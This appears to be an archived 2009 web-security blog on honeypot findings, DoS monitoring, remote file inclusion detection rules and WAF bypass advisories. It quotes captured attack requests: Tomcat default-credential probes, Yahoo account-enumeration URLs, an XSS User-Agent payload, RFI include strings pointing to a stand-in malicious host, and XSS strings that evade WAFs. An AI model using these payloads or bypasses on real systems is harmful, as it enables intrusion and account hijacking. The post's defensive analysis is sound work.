Tactical Web Application Security: 2009

Tuesday, October 6, 2009

Identifying Denial of Service Conditions Through Performance Monitoring

Submitted by Ryan Barnett 10/06/2009

Here is an interesting web application threat modeling exercise for you - how do you plan to identify and mitigate web application level denial of service conditions on your web sites?

This is one of those pesky security questions that, on the surface, seems pretty straight forward and then when you start peeling back the layers of complexity and interactions it becomes much more challenging. Here are some items to keep in mind.

Network DoS vs. Web App DoS

Whereas network level DoS attacks aim to flood your pipe with lower-level OSI traffic (SYN packets, etc...), web application layer DoS attacks can often be achieved with much less traffic. Just take a look at Rsnake's Slowloris app if you want to see a perfect example of the fragility of web server availability. The point here is that the amount of traffic which can often cause an HTTP DoS condition is often much less than what a network level device would identify as anomalous and therefore would not report on it as they would with traditional network level botnet DDoS attacks.

Rate Limiting

A common identification/mitigation implementation is to attempt Rate Limiting. This is essentially done by setting request threshold limits over a predefined period of time and monitoring request traffic for violations. While this is certainly useful for identify aggressive automated attacks, it has its own limitations.

What resources to protect?

While protecting a web application login page is straight forward, many web site owners have not properly identified which resources are both critical and susceptible to DoS conditions. There are many web apps that are extremely resource intensive and take a long time to complete - for example any reporting interface that needs to query a back-end database to generate large reports. These apps are perfect targets for a DoS attack as the overall number of requests needed to consume open http sockets and RAM is much lower than a request for a static resource.

What threshold to set?

Rate limiting is not a "one-size fits all" approach. It is highly dependent upon the resource itself. The threshold you would set against a login page to identify a brute force attack is much different then what you might set in order to identify a data scraping or DoS attack. The challenge for the defender is knowing ahead of time what to set. This is not easy as most users are missing a significant piece of the puzzle - correlating web application performance statistics. You may set an inbound rate limiting threshold for a resource that is either much too high and the application could fail due to the load (false negative), or you might set it much too low and start firing off alerts when in fact the application is able to handle the load quite fine (false positive).
Web Application Performance Monitoring

The best method for identifying fragile web resources and potential DoS thresholds is to actually monitor and track web application transaction processing times. Breach Security today announced that WebDefend 4.0 has a new Performance monitoring capability that aims to fill this important need.

With performance monitoring, the WAF user can track the average processing time including the combined average request time, web server processing time and response time. The following definitions apply in this pane:

• Request time is measured from the first packet to the last packet of the request.

• Web server processing time is measured from the last packet of the request to the first packet of the response.

• Response time is measured from the first packet to the last packet of the response.

With this information, it is easy to quickly identify the top URLs with high response latency and to pinpoint whether this is an application processing or networking issue. This data is a much truer picture of DoS conditions vs. rate limiting thresholds. The main advantages that this data brings to DoS threat modeling are identification of fragile resources that would be susceptible to attacks and to identify the an estimated threshold setting.

Monday, October 5, 2009

WASC Honeypots - Apache Tomcat Admin Interface Probes

Submitted by Ryan Barnett 10/05/2009

We have seen some probes similar to the following in our WASC Distributed Open Proxy Honeypots -

GET /manager/html HTTP/1.1
Referer: http://obscured:8080/manager/html
User-Agent: Mozilla/4.0 (compatible; MSIE
5.01; Windows NT 5.0; MyIE 3.01)
Host: obscured:8080
Connection: Close
Cache-Control: no-cache
Authorization: Basic YWRtaW46YWRtaW4=

This appears to be a probe attempt to access the Apache Tomcat Admin interface. This is due to the combination of URI "/manager/html" and port 8080. It looks as though the client is submitting authentication data in the Authorization header. If you decode the base64 data, it shows the credentials as "admin:admin" which is the default username/password combination when Tomcat is installed.

WASC Honeypot participant Erwin Geirnaert has seen similar activity and provides more data here. The attackers are conducting brute force scans trying different passwords for the "manager" account -

manager:Test
manager:adminservermanager:sqlserver
manager:2009
manager:159753
manager:1234qwerasdfzxcv
manager:1234qwerasdf
manager:1234qwer
manager:123qwe
manager:123qweasd

What do the attackers want to do once they gain access to the Tomcat server? Install backdoor/command WAR files so that they can execute code. Time to double check your default account passwords and implement those ACLs to only allow authorized clients to your Management interfaces...

Monday, September 14, 2009

Distributed Brute Force Attacks Against Yahoo

Submitted by Ryan Barnett 09/14/2009

As part of the WASC Distributed Open Proxy Honeypot Project (DOPHP), we have been able to track some pretty extensive distributed brute force attacks against Yahoo end-user email accounts. Valid email accounts and/or obtaining valid account credentials are a huge commodity for SPAMMERS. Identifying valid accounts is important as it allows them to only send SPAM messages to real accounts and they can also be able to sell lists of valid accounts to other SPAMMERS. Taking this a step further, if the SPAMMERS are able to enumerate valid credentials for an account (username and password) they can then hijack the account and use it for SPAMMING.

Normal Web Login

This methodology is not new and Yahoo is obviously aware of these attacks aim at their Yahoo mail web login interface page. This login page looks like this -

When a client clicks submit, the request looks similar to the following -

POST /config/login? HTTP/1.1
Host: login.yahoo.com
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://login.yahoo.com/
Cookie: B=ffetg09557ar5&b=3&s=od; cna=zwISA2sCdzgBAS+RbUtyRRes; Y=%2e
Content-Type: application/x-www-form-urlencoded
Content-Length: 296

.tries=1&.src=&.md5=&.hash=&.js=&.last=&promo=&.intl=us&.bypass=&.partner=&.u=007ofj55asupi&.v=0&
.challenge=hKhk9.OX5y0EOqJ3c4yxAH_rSrx5&.yplus=&.emailCode=&pkg=&stepid=&.ev=&hasMsgr=0&.chkP=Y&.done=http%3A%2F%2Fmy.yahoo.com&.pd=_ver%3D0%26c%3D%26ivt%3D%26sg%3D&login=foo&passwd=bar&.save=Sign+In

Notice the in the post payload that the application is tracking how many "tries" have been attempted. This is useful for throttling automated attacks and once a client goes over a limit, Yahoo then presents the user with an added CAPTCHA challenge -

Also notice that the login page is presenting the end user with a generic error message indicating that the credentials were not correct but it does not inform the user whether it was the login or password that was wrong. All of this type of anti-automation defense is good. The problem is - is Yahoo applying this type of defense consistently throughout their entire infrastructure? Are there any ways for the SPAMMERS to find a backdoor? Unfortunately, yes.

Web Services App

The WASC DOPHP has identified a large scale distributed brute force attack against what seems to be a web services authentication systems aimed at ISP or partner web applications. The authentication application is named "/config/isp_verify_user". Google links for the "isp_verify_user" app are here. One thing you will notice in looking at these results is that there is an incredibly large number of Yahoo authentication subdomains that are hosting this application and are able to authenticate clients. If you click on one of the links, you will see that the response data returned in the browser is terse. It is simply 1 line of data such as this -

ERROR:210:Required fields missing (expected l,p)

The format of this data is obviously not intended for end users, but it more tailored for parsing by web service applications. It very well could be that many front-end web applications are validating the credentials submitted by clients to these isp_verify_user app. This particular error message is returned when a client does not submit the l (login) and p (password) parameters.

If a client sends a request for a login/username that does not exist, the app will return a message of -

ERROR:102:Invalid Login

Remember the generic error message presented on the normal login web page? Not here - it is easy for a SPAMMER to automate sending requests and cycling through various login names to identify if/when they hit on a valid Yahoo account name. When this happens, the application gives a different Invalid Password error message -

ERROR:101:Invalid Password

Note that this application does not implement any of the same CAPTCHA mechanisms that the standard login page does. This means that the attackers have an unimpeded avenue of testing login credentials. If the client sends the correct credentials, they will receive a message similar to the following (where username is the data submitted in the "l" parameter) -

OK:0:username

With this information, the SPAMMERS can then log into the enumerated email account and abuse it as they wish.

Scanning Methodology

Here is small snippet of some of the transactions that were captured -

Get http://l33.login.scd.yahoo.com/config/isp_verify_user?l=kneeling@ort.rogers.com&p=qwerty HTTP/1.0
Get http://l06.member.kr3.yahoo.com/config/isp_verify_user?l=kneading@ort.rogers.com&p=000000 HTTP/1.0
Get http://69.147.112.199/config/isp_verify_user?l=kitbags@ort.rogers.com&p=333333 HTTP/1.0
Get http://217.12.8.235/config/isp_verify_user?l=kirk@ort.rogers.com&p=yankees HTTP/1.0
GET http://69.147.112.217/config/isp_verify_user?l=__miracle&p=weezer HTTP/1.0
GET http://69.147.112.202/config/isp_verify_user?l=123#@!.._69_&p=weezer HTTP/1.0
GET http://68.142.241.129/config/isp_verify_user?l=__lance_&p=weezer HTTP/1.0
GET http://202.86.7.115/config/isp_verify_user?l=__kitty__69__&p=weezer HTTP/1.0

The attackers used a three dimensional scanning methodology as described below -

Distributing the scanning traffic through multiple open proxy systems. This changes the source IP address as seen by the target web application so basic tracking/throttling is more challenging.
Distributing the traffic across different Yahoo subdomains. The advantage to this is that even if some form of failed authentication tracking is taking place, it is more difficult to synchronize this data across all systems.
Diagonal scanning - submitting different username/password combinations on each request. This is instead of vertical scanning which is choosing 1 username and cycling through passwords or horizontal scanning which is choosing 1 common password and cycling through userenames.

*Diagonal, vertical, horizontal and three dimensional brute force scanning terminology is taken from a forthcoming book by Robert "Rsnake" Hanson.

Defensive Takeaways

Implement proper ACLs against all web services apps. In this case, the isp_verify_user app was clearly not intended for direct client usage however there are no ACLs that prevent an end user from accessing them.
Need to identify any rogue web application authentication interfaces. This is a big problem for organizations that are either newly deploying distributed web services apps or those who have newly acquired a business partner.
Every web application must have some form of anti-automation capability in order to identify when clients are sending these requests.

Thursday, September 10, 2009

Identifying Anomalous Behavior

Submitted by Ryan Barnett 09/10/2009

A quick test for you - can you tell what is abnormal about this web application request transaction that was captured by the WASC Distributed Open Proxy Honeypots Project?

GET http://www.example.com/ HTTP/1.1
User-Agent: User-Agent:Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Accept-Language: zh-cn
Accept: */*
Host: www.example.com
Cookie: dedifa=3984320578.43783.3716814272.929907673, BIGipCookie=0000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000000, ASPSESSIONIDCSCBAQDQ=KMBPKNLCKCHMOMJAOPDPEPDF, pmaCookieVer=4, phpMyAdmin=98kdlkphdefb4lr6g5q9pke4if6gh0hg, pma_fontsize=82%25, session-id=00710064d8f2a4412ad4aeff56e96a2d, 802db0210e6b5f898c3d7fb3f82e11c0=-, _WealthCity_session=BAh7BzoPc2Vzc2lvbl9pZCIlN2NiMjM4MDM1Njk5ZDRlZTllMTY
4ZmZjYjE1NTVmNDU6EF9jc3JmX3Rva2VuIjE3YjVld0xiRkFvRy9zcnRJc1p1cDhsRldaZ
01TRTVqQ1l3RlhHUlNUNndVPQ%3D%3D--72c082556f241f5e62a26209b7c23cc42dbf
ae29, SQMSESSID=8dddae5eis8o9l2g6aul2o3ip4, JSESSIONID=678dcb81bdc1ce2e82346199c86d, SERVERID=A, CMSSESSID3aab33f1=96d98c3e54be906ecdf12195ada689a6, Compaq-HMMD=3BE1E1BD3B3B4AFED8970001A6AACE4862D267BC50C270927260D36E, _sm_au_d=1, SOrder=DatePr%2DDOWN%2D0%2D0%2D0%2D0, SRecInPage=30, ASPSESSIONIDCCRBACRC=DFEPKLMCAJDOEIPMMHNKMMCA, PHPSESSID=cf753ceefc14a51281818d11471552d4, _bz_session=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsY
XNo%0ASGFzaHsABjoKQHVzZWR7AA%3D%3D--1eb7a63eabc98dec0e0f418633d652fb97f5a8db, _session_id=8e87b0524f883f7c820ec6a136f7438b, SATSATSQID=goZXTx8HbQ5eBfjGevkYJ5-Lv-M8ChUHe-NfvvDycOHkc8CTM2SrJ4F_Y_IPU6Sc, ARPT=ZXJIWKS10.32.254.104CKMWW, SESSdab19e82e1f9a681ee73346d3e7a575e=fbc279a6c6c2e66cac0a6aba173bb261, vb_session=77e75d1912c7b6d796dae865fb95149a, BAIDUID=2A880F37E13E5EB37286E3EFF5BF43AA:FG=1
Proxy-Connection: Keep-Alive

Two anomalous items of interest in this request -

1) Bogus User-Agent payload
Specifically the string "User-Agent" actually appears at the beginning of the header payload. This looks like a botched script that tried to spoof the User-Agent data.

Defensive recommendation - look for this string in the User-Agent field and tag the request as an automated client that is spoofing request header data.

2) Number of diverse SessionIDs
The number of SessionID related cookies in this request is certianly larger than normal. Also note that there are SessionIDs for different web application technologies -

ASPSESSIONID - for ASP web apps
JSESSIONID - for Java web apps
PHPSESSID - for PHP web apps

What are the odds that this website is running all three of those web technologies? Pretty slim...

My take is that the scripted client is just populating bogus SessionID data for a bunch of different apps with the hopes that this would pass basic filters that force a SessionID name to exist but don't have knowledge of valid/active values. The most likely candidate is a SPAM bot that is looking to post data to blogs, forums, etc...

Defensive recommendations -

A. Count the number of SessionIDs/Cookies submitted. If it is too large, then alert as appropriate.

B. Look for SessionIDs/Cookie names that do not match your web application technology.

There are numerous other methods to identify anomalous web application activity. Security applications that are able to automatically generate web application learning and profiling (such as web application firewalls and web fraud systems) and correlate data from application users are able to identify deviations from the norm. These are complex systems that have advanced logic components to identify anomalous traffic such as that which is presented here.

Tuesday, August 18, 2009

WASC Distributed Open Proxy Honeypot Update - XSS in User-Agent Field

Submitted by Ryan Barnett 8/18/2009

In case you missed it, the WASC Distributed Open Proxy Honeypot Project launched Phase III at the end of July. We have a few sensors online and as we start gathering data, we are starting our analysis. Our goal is to be able to release "events of interest" to the community to try and raise awareness of web-based attacks.

As part of my day job working with web application firewalls, I often get asked about why certain signatures should be applied in certain locations. Why not just apply signatures to parameter payloads? This would certainly cut down on potential false positives and also increase performance. While it is true that the most likely attack vector locations are parameter payloads, these are not the only ones. Where else should you look for attacks?

Well, in looking at the honeypot logs today, I noticed an interesting XSS attack vector - injecting the XSS code into the request User-Agent string. Here is an example of the captured data -

GET http://www.example.com/image-2707303-10559226 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Referer: http://www.example.co.uk/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; <script>window.open('http://www.medchecker.com/side.htm','_search')</script>)
Host: www.example.com
Connection: Keep-Alive

Notice the window.open javascript code in the UA payload? The intent here seems to be to target any web-based log analysis tool. So, now that you know that the User-Agent data is a possible attack vector, the question is are you applying proper input validation/signature checking there? Are you logging this data to know if clients are attempting this attack?

Monday, August 17, 2009

WASC WHID 2009 Bi-Annual Report - Social Media Sites Top Most Attacked Vertical Market

Submitted by Ryan Barnett 8/17/2009

Do you remember that line from the movie Field of Dreams: "If you build it, they will come"? Well, according to the data captured from the Web Application Security Consortium (WASC) Web Hacking Incidents Database (WHID) project, online criminals are re-enforcing that movie quote. The fact is that profit driven criminals have learned that they can utilize social networking types of web sites (such as Twitter, Facebook and MySpace) as a means to target the huge number of end users.

Breach Security Labs, a WHID contributor, has just released a whitepaper report that analyzes the WHID events from the first half of 2009. In the report, it was found that Social Networking sites (such as Twitter) that utilize Web 2.0 types of dynamic, user-content driven data, are the #1 targeted vertical market. The reason for this is really two-fold:

1) Criminals are now directly targeting the web application end-users. The bad guys are using flaws within web applications to attempt to send malicious code to end users. Popular websites that have large user bases are now ripe targets for criminals. These are target rich environments.

2) Social networking sites are so popular partly because they allow their users to customize and update their accounts with user-driven content, widgets and add-ons. These features make the sites dynamic and fun for the end users, however they also unfortunately also significantly increase the cross-site scripting (XSS) and cross-site request forgery (CSRF) attack surfaces.

The combination of these two points resulted in a number of different social media WHID 2009 Entries:

WHID 2009-2: Twitter accounts of the famous hacked
WHID 2009-4: Twitter Personal Info CSRF
WHID 2009-11: Lil Kim Facebook Hacked
WHID 2009-15: Kayne West has been Hacked
WHID 2009-23: Miley Cyrus Twitter Account Hit By Sex-Obsessed Hacker
WHID 2009-31: Double Clickjacking worm on Twitter
WHID 2009-32: 750 Twitter Accounts Hacked
WHID 2009-37: Twitter XSS/CSRF worm series

These examples clearly show that social networking sites that utilize Web 2.0 technology are the #1 attacked vertical market in WHID. This is important as social networking were grouped in the Other category in 2008. I would suspect the trend of targeting large pools of end users to continue in the future as the bad guys work on methods of automating and scaling their attacks.

Monday, June 22, 2009

We've been blind to attacks on our Web sites

Submitted by Ryan Barnett 6/22/2009

There was an interesting article posted over on Inforworld's website entitled We've been blind to attacks on our Web sites that drives home an important use-case for web application firewalls - visibility of web traffic. Too many people get caught up in the "Block attacks with a WAF" mentality that they forget about the insight that can be gained into simply having full access to the inbound request and response data. From the article -

Of course, as the security manager, I can't afford a false sense of security, so I recently took some steps to find out just what was going on within our Web servers' network traffic. And it turns out that many attacks have been getting through our firewalls undetected. We'll never know how long this has been going on.

This is a typical first reaction. Most of today's network firewalls have some sort of Deep Packet Inspection capabilities however most people don't use it due to performance hits. The firewalls are mainly geared towards either allowing a connection or not based on the source destination IPs and Port combos instead of the actual application payloads. This is somewhat like when you use the telephone to call someone. A firewall would just check to see if you are allowed to call that phone number or not but it doesn't usually look at what you are actually saying in the conversation once you are connected. The other big hindrance to inspecting web traffic at a network firewall is SSL. You have to be able to decrypt the layer 7 data in order to inspect it.

My company's front-end Web servers, which directly receive connections from the Internet through our firewalls, are definitely a hot spot in our network. The firewalls and IDS allow us to see some of what's going on, but can they really detect active content-based attacks? To find out, I installed a Web application firewall in my company's DMZ to tell us about active attacks that may not be identified by our other devices. I set the device up in monitor mode, though it can be set up to block attacks, because my goal was just to see what was going on. I wanted to know more about what's inside the connections to those Web servers.

This section shows that the WAF can initially be deployed in a "Detection Only" or monitoring mode to allow for visibility.

What I discovered is that our Web sites are being "scraped" by other companies -- our competitors! Some of the information on our sites is valuable intellectual property. It is provided online, in a restricted manner (passwords and such), to our customers. Such restrictions aren't very difficult to overcome for the Web crawlers that our competitors are using, because webmasters usually don't know much about security. They make a token attempt to put passwords and restrictions on sensitive files, but they often don't do a very good job.

Scraping attacks that are executed by legitimate users and aim to siphon off large amounts of data are a serious threat to many organizations. They types of attacks can not be identified by signature based rules as there is no overt malicious behavior to identify if only one individual transaction is inspected. Behavioral analysis needs to be employed to correlate multiple transactions over a specified time period to see if the there is an excessive rate being used. Anti-automation defenses here are critical.

Our Web application firewall found some other problems as well. We experience hundreds of SQL injection attack attempts every day. So far, none has been successful, but I'm amazed at the sheer volume. I can't imagine anyone having the time to sit around trying SQL injection attacks against random Web servers, so I have to assume that these attacks are coming from automated scripts. In any case, they are textbook examples of SQL injection, each one walking through various combinations of SQL code embedded in HTML. It looks like we've done a good job of securing our Web applications against these attacks, but it's always a little disconcerting to hear invaders pounding on the door.

As this section of the article shows, having visibility into the types of automated attacks being launched against a web application provides two key pieces of data -

Understanding of the Threat component of the Risk equation - there are many academic types of debates and discussions that happen early on in the development of software. One of the more challenging aspects to quantify is the threat. Is there really anyone out there targeting our sites? Where are they coming from? What attacks are they launching? Without this type of confirmed data obtained from the production network, it is difficult to accurately do threat modeling.
Validation of secure coding practices - it will become evident very quickly whether or not the web application is vulnerable to these types of injection attacks. If the application does not implement proper input validation mechanisms, then there is a possibility that the injected code will be executed and the application will respond abnormally. By inspecting both the inbound request and the outbound response, it is possible to confirm if/when/where input validation is faltering.

Monday, June 15, 2009

Challenges to webappsec - lightweight development

Submitted by Ryan Barnett 6/15/2009

Lightweight development of web applications (using WYWIWYG editors such as Shockwave/Flash) has created an interesting hiring trend that I believe has negatively impacted web application security. Due to the fact that these web development tools are so easy to use, they do not need to be run by an actual programmer. This fact has resulted in a major shift of web content being created by Graphic Designers instead of actual web application developers. Here is an actual job posting that I just ran across that confirms this trend:

About the Job
Web Graphic Designer / Flash Designer
Direct Response company is seeking a full-time, talented web designer who can hit the ground running, working with in-house designers to help design and develop concepts and web campaigns for various products. This is NOT a programming and/or developer position, we are looking for graphic designers who are experienced in web design.

This may not pose any significant security issues if you are only displaying a dynamic intro page to your site, however these types of applications are doing more and more these days. There are been numerous security vulnerabilities identified within Flash applications such as XSS and there are even been some assessment tools released such as SWFScan to help find issues.

The big problem that I see is that it is hard enough to try and develop secure web application code when you have a true developer who is trained in secure coding principles. You don't have a fighting chance of having secure code if you now ask someone who is not a developer and is using a lightweight development tool like Flash. To make matters worse, if you are in this scenario and then you do happen to run vulnerability assessments against the resulting code, what are you going to do to fix the issue??? Good luck having your Graphic Designer fix the CSRF bug you found in their splash page.

Wednesday, June 10, 2009

Generic Remote File Inclusion Attack Detection

Submitted by Ryan Barnett 6/10/2009

A big challenge for identifying web application attacks is to detect malicious activity that cannot easily be spotted using using signatures. Remote file inclusion (RFI) is a popular technique used to attack web applications (especially php applications) from a remote server. RFI attacks are extremely dangerous as they allow a client to to force an vulnerable application to run their own malicious code by including a reference pointer to code from a URL located on a remote server. When an application executes the malicious code it may lead to a backdoor exploit or technical information retrieval.

The application vulnerability leading to RFI is a result of insufficient validation on user input. In order to perform proper validation of input to avoid RFI attacks, an application should check that user input doesn’t contain invalid characters or reference to an unauthorized external location. Or Katz, who is the WebDefend signature team lead at Breach Security recently gave a presentation at the OWASP Local Chapter meeting in Israel and Breach Security Labs has since released a whitepaper based on his research. I would like to highlight a few of the detection items that were presented.

Challenges to Generic Detection

When trying to use a negative security approach in order to have generic solution for the RFI attack we will try to use the following regular expression to search for a signature such as “(ht|f)tps?://” within parameter payloads. This initially seems like a good approach as this would identify the beginning portions of a fully qualified URI. While this is true, this approach will unfortunately result in many false positives due to the following:

There are request parameters which are used as external link (e.g. - accepts http:// as valid input) that point either back to the local host (WordPress and other apps do this) or legitimately point to a resource on a remote site.
There are "free text" request parameters that are prone to false positives. In many cases these parameters contains user input (submission of free text from the user to the application) and in other cases parameter that contains large amount of data (may include URL links that can be false detected as RFI attack).

URL Contains an IP Address

Most legitimate URL referencing is done by specifying an actual domain/hostname and as such using an IP address as external link may indicate an attack. A typical attack using an IP address looks like:

GET /?include=http://192.0.55.2/hacker.txt HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Therefore a rule for detecting such a condition should search for the pattern “(ht|f)tps?:\/\/” followed by an IP address. An example ModSecurity rule to detect it is:

SecRule ARGS "@rx (ht|f)tps?:\/\/([\d\.]+)" \
"t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,deny,phase:2,msg:Remote File Inclusion.'"

The PHP "include()" Function

Breach Security Labs has seen any attack vectors (from customer logs and honeypot data samples) that try to include remote file by using the PHP "include" keyword function. A typical attack using an include PHP keyword looks like:

GET /?id={${include("http://www.malicuos_site.com/hacker.txt")}}{${exit()}}HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

A rule for detecting such a condition should search for “include(“ followed by “(ht|f)tps?:\/\/”. An example ModSecurity rule to detect this is:

SecRule ARGS "@rx \binclude\s*\([^)]*(ht|f)tps?:\/\/" \
"t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,deny,phase:2,msg:’Remote File Inclusion'"

RFI Data Ends with a Question Mark (?)

Appending question marks to the end of the injected RFI payload is a common technique and is somewhat similar to SQL Injection payloads utilizing comment specifiers (--, ;-- or #) at the end of their payloads. The RFI attackers don't know what the remainder of the PHP code that they are going to be included into is supposed to do. So, by adding the "?" character, the remainder of the local PHP code is actually treated as a parameter to the RFI included code. The RFI code then simply ignores the legitmate code and only executes its own. A typical attack using a question mark at end looks like:

GET /?include=http://www.malicuos_site.com/hacker.txt? HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

A rule for detecting such a condition such an attack should search for “(ft|htt)ps?.*\?$”. An example ModSecurity rule to detect it is:

SecRule ARGS "@rx (ft|htt)ps?.*\?+$" \
"t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,deny,phase:2,msg:’Remote File Inclusion'"

RFI Host Doesn't Match Local Host

One other technique that can be used to detect RFI attacks (when the application never legitimately references files offsite) is to inspect the domain name/hostname specified within the parameter payload and then compare it to the Host header data submitted in the request. If the two items match, then this would allow the normal fully qualified referencing back to the local site while simultaneously deny offsite references. For example, the following legitimate request would be allowed as the hostnames match:

GET /path/to/app?foo=bar&filename=http://www.example.com/somefile.txt HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

A rule for detecting such a condition such an attack should initially search for “^(?:ht|f)tps?:\/\/(.*)\?$” which also captures the hostname data within the 2nd parentheses. The 2nd part of this rule then compares the saved capture data with the macro expanded Host header data from the request. An example ModSecurity rule to detect it is:

SecRule ARGS "^(?:ht|f)tps?://(.*)\?$" \
"chain,phase:2,t:none,t:htmlEntityDecode,t:lowercase,capture,ctl:auditLogParts=+E,block,log,auditlog,status:501,msg:'Remote File Inclusion Attack'"
SecRule TX:1 "!@beginsWith %{request_headers.host}"

These generic RFI rules could be used individually or collaboratively in an anomaly scoring scenario to help identify these types of attacks. Keep an eye out for a major public release of the new ModSecurity Core Rule Set (CRS) as it will include these new rules and many others.

Friday, June 5, 2009

WAF Bypass Issues: Poor Negative and Positive Security

Submitted by Ryan Barnett 6/5/2009

In my previous post I provided an overview of potential WAF identification techniques discussed in a recent OWASP AppSec conference talk. In this entry, I want to discuss the other half of their talk which highlights a few different WAF/security filter bypass issues. From their Advisory report, we find the following two main issues -

Negative Security Signature Bypass

::::: Blacklist / negative model bypass :::::
CVE: CVE-2009-1593
Description: Profense Web Application Firewall with default configuration in negative model can be evaded to inject XSS.
Technical Description:
Versions 2.4 and 2.2 of Profense Web Application Firewall with the default configuration in negative model (blacklist approach) can be evaded to inject XSS (Cross-Site Scripting). The problem is due to the built-in core rules that can be abused using the flexibility provided by HTML and JavaScript.
The vulnerability can be reproduced by injecting a common XSS attack in a vulnerable application protected by Profense Web Application Firewall. Inserting extra characters in the JavaScript close tag will bypass the XSS protection mechanisms. An example is shown below:
http://testcases/phptest/xss.php?var=%3Cscript%3Ealert(document.cookie)%3C/script%20ByPass%3E

As you can see from the bolded section of the closing script tag above, by inserting extra text within this tag, it was able to bypass the negative signature that was within the WAF.

Analysis

When creating negative security regular expression filters, it is challenging to make them accurate and balance both false positives and negatives. In this particular case, it seems as though the Cross-site Scripting (XSS) signatures were a bit too specific, since the signature(s) were able to be bypassed by adding in additional text to the closing script tag. This leads me to believe that perhaps all of the XSS signatures ended with a closing script tag. XSS attacks don't always have to end with this tag for two main reasons -

Some browsers only need to see the opening script tag in order to execute the payloads, and
Many XSS vulnerabilities manifest themselves because the client supplied data is inserted into an existing script tag in the output so including it within the attack payload is not necessary.

It is for these types of reasons that many people use negative security signatures that look for smaller components of attack payloads rather than trying to describe the entire thing. For instance, in this case, what about some smaller individual regexs that looked for the opening script tag, the alert( action or the document.cookie object on their own? If you use smaller signatures, then you could still correlate matches together as part of an anomaly score and it would be more difficult for an attacker to circumvent them all.

While this specific advisory identified an issue with one particular WAF vendor it could happen to any of them. Anyone who has been in the security industry for a period of time understands that negative security rules or signatures is not bullet proof and evasions are always a concern. It is somewhat like the Anti-Virus market in that user's are constantly playing catchup with the bad guy's newest attack techniques. If you rely upon negative security signatures that are created specifically for known attack vector's then you are doomed to run on the Hamster Wheel of Pain where you have to update the signatures constantly.

Considering that this specific issue was a bypass/evasion of a negative security rule - I do not necessarily believe that it warranted an actual public vulnerability announcement. If public announcements for negative security filter bypasses of a security device was the norm, then we would be flooded with them for all IDS/IPS/WAF systems as they all have bypass problems. It is for this reason that you can not rely upon negative security rules/signatures alone for protection against web application attacks. You need to also utilize positive security rules, which brings us to the 2nd part of the advisory.

Positive Security Model Bypass

::::: Whitelist / positive model bypass :::::
CVE: CVE-2009-1594
Description: 
Profense Web Application Firewall configured in positive model can be evaded.
Technical details:
Profense Web Application Firewall configured to make use of the strong positive model (white-list approach) can be evaded to launch various attacks including XSS (Cross-Site Scripting), SQL Injection, remote command execution, and others. 
The vulnerability can be reproduced by making use of a URL-encoded new line character. The pattern matching in multi line mode matches any non-hostile line and marks the whole request as legitimate, thus allowing the request. This results in a bypass in the positive model. An example is showed below:
http://testcases/phptest/xss.php?var=%3CEvil%20script%20goes%20here%3E=%0AByPass

Similar to the negative security bypass issue shown previously, the security researches found that they could evade the positive security model profile by inserting a url encoded linefeed character (%0A) to the end of the attack payload and then appending a payload that actually matched the acceptable profile.

Analysis

While I somewhat downplayed the previous negative security bypass issue, I do believe that this is a serious vulnerability and it certainly does warrant a public announcement. This is more serious of an issue as it isn't just a particular signature that is evaded but potentially an entire set of signatures/rules that are meant to provide better confirmation of the payload.

The underlying problem with this particular WAF application is that its Regular Expression engine was most likely configured to run in "multiline mode." Combine that configuration with a poorly constructed positive security regular expression ruleset (that is not utilizing proper beginning/end of line anchoring) and you end up with this bypass situation.

Proper construction of positive security regular expression rules is not an easy task. Remo is a GUI rules editor for ModSecurity rules and it is quite useful for manually creating these positive security rules to enforce items such as the expected character set, format of length. Here is a graphical representation of what Remo does with the data inserted by the user.

If you look and see how the data is translated into the ModSecurity rules language syntax, it is using a regular expression operator that is using beginning (^) and end of line ($) anchors to ensure that the character classes specified match against the entire payload and not just a portion of it.

Conclusion

A few closing thoughts on this topic. First of all, this advisory shows that both negative and positive security models can have shortcomings and flaws. It is not enough to rely upon either one alone. A top tier WAF should be able to take data from both the negative security signatures and any anomalies identified from the positive security model and then correlate them together for increased intelligence and coverage. If you look at both of these examples together, these two components were clearly used in a mutually exclusive fashion. It seems as if the positive security model was used, then the negative security signatures were not evaluated. From a sheer performance perspective this might be good, but not from a security one. These two models should be used together for better coverage.

Any web security device that is apply regular expression filters/signatures/rules should be reviewed to validate exactly how the regular expression engine is configured and to review the construction of the rules themselves.

Wednesday, June 3, 2009

WAF Detection with wafw00f

Submitted by Ryan Barnett 06/03/2009

Another interesting presentation that was given by Wendel Guglielmetti Henrique, Trustwave & Sandro Gauci, EnableSecurity at the recent OWASP AppSec EU conference was entitled The Truth about Web Application Firewalls: What the vendors don't want you to know. The two main topics to the talk were WAF detection and evasion.

WAF Detection

The basic premise for this topic is that inline WAFs can be detected through stimulus/response testing scenarios. Here is a short listing of possible detection methods:

Cookies - Some WAF products add their own cookie in the HTTP communication.
Server Cloaking - Altering URLs and Response Headers
Response Codes - Different error codes for hostile pages/parameters values
Drop Action - Sending a FIN/RST packet (technically could also be an IDS/IPS)
Pre Built-In Rules - Each WAF has different negative security signatures

